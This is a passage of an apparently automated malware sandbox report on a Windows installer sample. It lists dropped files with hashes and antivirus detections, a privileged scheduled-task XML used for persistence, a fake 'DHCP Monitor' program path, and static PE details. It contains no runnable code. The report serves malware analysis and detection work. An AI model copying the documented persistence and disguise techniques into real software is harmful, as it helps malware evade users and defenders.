              SHA-256:AF23271A22B4657CF3765BB7A1A40E130CB9145D4549D004CF9BAF1C4CB854CA
              SHA-512:BFC53D9B2047DB89CB5828C49C12CA68BB999F9633EE8FD11BB9E110634812F18137280E6DE79AFD1C3B83731E4F21F6300F92BFDD9917ED6576F3111144A8CE
              Malicious:false
              Preview: .\.5...x).....b?...k.1P&........f.p...3..d.;.vR7.P...c....1...u.aH...hSE}...^&.@wL..DI.........I.`VS..v..J..*o.A...@..\..S#..aU ....%......!I...Ym.V....#..r6..o..YbA.bN..../.....sj.T..EX..G...F...kG.}7#6x....<.}......L..K.D..H.#a...~:_.'............9M..\...).<..6.;.(..v.......d.P.4....H..c.m.s4-=..N.........l...,.j'....Y.*.Ex..F.5c?..c>....qhq...#..>.nm.{.xp....$M.}.V.?[uY.(.&.TW..#..=....M.....k......ln..W.j.cbX......6F.D.>...x..K.:_.f3kD..l...^...q9.vW.@.3.OG..`.9...fPc..!..'c0.r.}.?...O...%.*.EY%H.+.y.]..D.f.:....M.I...X=.1.U....K}.I...aY.N...c...M.....G.........8..dw.m...L..O.@^..a>.....?...[9.T":..dO0..1.$......?8..rs..n&U. h.[e...N. *h....T..MW$....!.&2...@.Y.bL..Gv.L...|.2....4{wEZ.iB....n.....P.6z.c...R.z...>.O#rr..p....H...O..NkjZ*w...'{..L....]]Q...s5...o....}.6.f.....)>R`.l.5A....{.A..z....'.b..A..];d.2.w..P...-.....X.>W#...0.o.#S2%..U..m..K.............h%...H.5A...Ul....:1....3......A...iN...JI.C..=....Z..q.3.C..r..C..Y....}
              C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%
              • Antivirus: Metadefender, Detection: 14%
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%
              • Antivirus: Metadefender, Detection: 14%
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%
              • Antivirus: Metadefender, Detection: 14%
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):5120
              Entropy (8bit):4.042717862409682
              Encrypted:false
              SSDEEP:48:a2f1CPWItdEEB+dlbcTeJjhaYLTxGCv402KcUlWG6QmtN1BbRuqS:InB+7cTkTxGCA02K74tp1x
              MD5:55ED3B347F615FAE9FB0D62EFA642861
              SHA1:2978295CFE6CB8ED8C7D7BCEBF0CB13DCD6C9256
              SHA-256:9C94096638FBAD8F4F41E33012437C149ECD4AB055E56FDDACBD35CBCB2ADCB6
              SHA-512:4AC65E360218AE12205C79C32C057B78065EFDD81C679B706694CE22A5F3838473897617E8C973DD738F312494B01082A4A292176CB6E00E5B29A110B0F2B3A5
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Virustotal, Detection: 19%
              • Antivirus: Metadefender, Detection: 14%
              • Antivirus: ReversingLabs, Detection: 41%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...>.f`...........!......................... ...............................P.............A.........................!..L....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\tmpDE28.tmp
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1301
              Entropy (8bit):5.109950989988902
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0POLxtn:cbk4oL600QydbQxIYODOLedq3SOj
              MD5:7F3B873F0BEBEC1CA523C1EA10D53D80
              SHA1:3EB161B07F5EF732D6C39DD6BC13E1C3AD3036E4
              SHA-256:E0932A6253B8851243AFF143973201F1F4D88A908DA580AFC1AB83A0EC043CDE
              SHA-512:8C8EB7B8FED0A52CBB0CFA4471C1A7780D50C8D249CD14F0FD590662046D6A6705968C66EDA96A4C0E58D0746E4B6BD9E485C4CDC06D630C7FEA2ECFB86AD107
              Malicious:true
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\xavbedcnsrtbhix
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:data
              Category:dropped
              Size (bytes):11781
              Entropy (8bit):7.984459379386964
              Encrypted:false
              SSDEEP:192:pBenVpIMVi3Lb5zyZXE/yld/gQOEBaX0wZkWVAMrtFW0VzoiSrWP6WQpHWcJcNdD:yVCR52ZXs8dQ1RZkEAmtd1olYWHWcwIE
              MD5:BCB945B4C41466420E84B5CED1F7C5F4
              SHA1:5041C43DEBCC2B9E65D11D658F0FE8C8A45E074F
              SHA-256:B4BC8BCAFC597734DFF776D588DCF7F82C6BA6A1BA96F04A0B384B3F30AA4E24
              SHA-512:645EB26BA2E711C68A1982CB4D93A9432B610B64A92CAFA134ED7219272677F44B1BA7BC27F75FE94CBBB6EF5AA1EB8B33257391FB04FC1BDF04EA4997FFB621
              Malicious:false
              Preview: tD*@J..p............>a..e.6q..{.r.w.z..E.LS.,_N.........._..$....x.!#..l..P3-/."x&..X...4"T.......^....gqs...j",.C=?hf.v.8.OY[D..R../...P...`7......r|.......>H.....3.Z.o.......w........O$. ..g...0:<M.'..m...-iM..=......S........K.e..#e..{3..{i.I../II.O..yO....K....k.E...y.W..".?....S...<.$........<.....d...+%'.6p....7..,^L:..d...8HX...|_ik...b.$.{uw`h.n&0.GQS|.J....HP.V.........jt......~v@...5..HZ!...KP)*..3....9......'.". ....4.0..6.. .68.u./BMkr.ef......U...b3xEF`..vx35ENPZu.Xl....F....c.....I..I........wI....KX.5..../j..(7..9....../J..}...)+..L1N/.....-/.n6(...^]7.......egq....OuLK]..{u2..n..oa:.......G....^m.....szdj.t.#L....LN......:.....1............7......,.a2......8.s8..u..C..q...`jl.[l.....oe^p'.>&..bE.F.j..V./...$.........r...y..{=....}....I[...........y.^AD.O.....K..........A/;5. -,9,.7..:.6......p..eugq>m.t{uw&.R3e.=AC..9S[U.SOO......~....J...}t<.y.G......Iv...RP.....j[...,.....D.......P....W..(....a..a.......aB<d.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:dropped
              Size (bytes):1856
              Entropy (8bit):7.089541637477408
              Encrypted:false
              SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
              MD5:30D23CC577A89146961915B57F408623
              SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
              SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
              SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
              Malicious:false
              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ISO-8859 text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:3:wFGet:wrt
              MD5:DF854956BB207377B050755321BC7605
              SHA1:1E82091BE0AD796EAF136C55B5AD83D650AE72CA
              SHA-256:0E92D96AF7FB340B34C5C7EEE2AEF7059B5B0181952CE900B27F8A8B8E0FEA2B
              SHA-512:BAB25B65AC0C3F2496924D04DBD89E32029C248350440BBB3C9EF6268AA7E389BFDD9F6982350B6CBD38B107B42D291801671B52129B47F075FC76EF1F128C2D
              Malicious:true
              Preview: .>.c...H
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:dropped
              Size (bytes):24
              Entropy (8bit):4.501629167387823
              Encrypted:false
              SSDEEP:3:9bzY6oRDIvYk:RzWDI3
              MD5:ACD3FB4310417DC77FE06F15B0E353E6
              SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
              SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
              SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
              Malicious:false
              Preview: 9iH...}Z.4..f..J".C;"a
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:modified
              Size (bytes):64
              Entropy (8bit):5.320159765557392
              Encrypted:false
              SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
              MD5:BB0F9B9992809E733EFFF8B0E562CFD6
              SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
              SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
              SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
              Malicious:false
              Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:data
              Category:dropped
              Size (bytes):327768
              Entropy (8bit):7.999367066417797
              Encrypted:true
              SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
              MD5:2E52F446105FBF828E63CF808B721F9C
              SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
              SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
              SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
              Malicious:false
              Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):38
              Entropy (8bit):4.405822250285691
              Encrypted:false
              SSDEEP:3:oNUWJRWHSkV0Cn:oNNJApL
              MD5:0FB77C8DB46E53AD33B0288C4C8A4A14
              SHA1:3FE522409B1B18F07306B6F1691DD73D4B2A6212
              SHA-256:22C5A9F7013302D91E32B386E8B545BDDBB8F749FDC6CB403ACBB583FD3AD8C0
              SHA-512:98A7A9F58366F7C8BB237D0E73AF412105AF017240272B37D28F845C7C1BE26D7751769D0A83A2E485080C902903ABD48A7930D29A96964BB9820AA6754FED4D
              Malicious:false
              Preview: C:\Users\user\Desktop\bGf2H3tXGg.exe

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):5.903583773476114
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:bGf2H3tXGg.exe
              File size:702907
              MD5:f72a7fd231e50f9b43c3dab470364846
              SHA1:1ac9f0876ec8f4b95fb0bbae48c2a5b5d02ed411
              SHA256:fb01157b437b00f34999faa320bb55c8e44bdbb415e9a15503035bfe0e1d40d6
              SHA512:c12bc1d2b74c2f209eadd40c02a56ee4b1a21287ab5b3391118f1fa12971c39dcbe2b8174b43a4d19281680247398140b223e0f00f03896b71aa8aa2352c084e
              SSDEEP:6144:69X0GFb/PdSrw+uHwUa5EIZUNf5F6p363E+r+voPIQLAoxQHHmAOZPBwf9:M0o1+Bvgs36pcoPIWPxUH1F
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f..........H3............@

              File Icon

              Icon Hash:e0d8d8d4d4d8d0e8

              Static PE Info

              General

              Entrypoint:0x403348
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:ced282d9b261d1462772017fe2f6972b

              Entrypoint Preview

              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080B8h]
              call dword ptr [004080BCh]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [0042F42Ch], eax
              je 00007F28E8708C83h
              push ebx
              call 00007F28E870BDE6h
              cmp eax, ebx
              je 00007F28E8708C79h
              push 00000C00h
              call eax
              mov esi, 004082A0h
              push esi
              call 00007F28E870BD62h
              push esi
              call dword ptr [004080CCh]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F28E8708C5Dh
              push 0000000Bh
              call 00007F28E870BDBAh
              push 00000009h
              call 00007F28E870BDB3h
              push 00000007h
              mov dword ptr [0042F424h], eax
              call 00007F28E870BDA7h
              cmp eax, ebx
              je 00007F28E8708C81h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007F28E8708C79h
              or byte ptr [0042F42Fh], 00000040h
              push ebp
              call dword ptr [00408038h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [0042F4F8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 00429850h
              call dword ptr [0040816Ch]
              push 0040A188h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x5adc8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0

              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x38000 | 0x5adc8 | 0x5ae00 | False | 0.0467997764787 | data | 2.65052430635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x38280 | 0x42028 | data
RT_ICON | 0x7a2a8 | 0x468 | GLS_BINARY_LSB_FIRST
RT_ICON | 0x7a710 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON | 0x7ccb8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON | 0x7dd60 | 0x10828 | dBase III DBT, version number 0, next free block index 40
RT_ICON | 0x8e588 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_DIALOG | 0x927b0 | 0x100 | data | English | United States
RT_DIALOG | 0x928b0 | 0x11c | data | English | United States
RT_DIALOG | 0x929cc | 0x60 | data | English | United States
RT_GROUP_ICON | 0x92a2c | 0x5a | data
RT_MANIFEST | 0x92a88 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

              Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
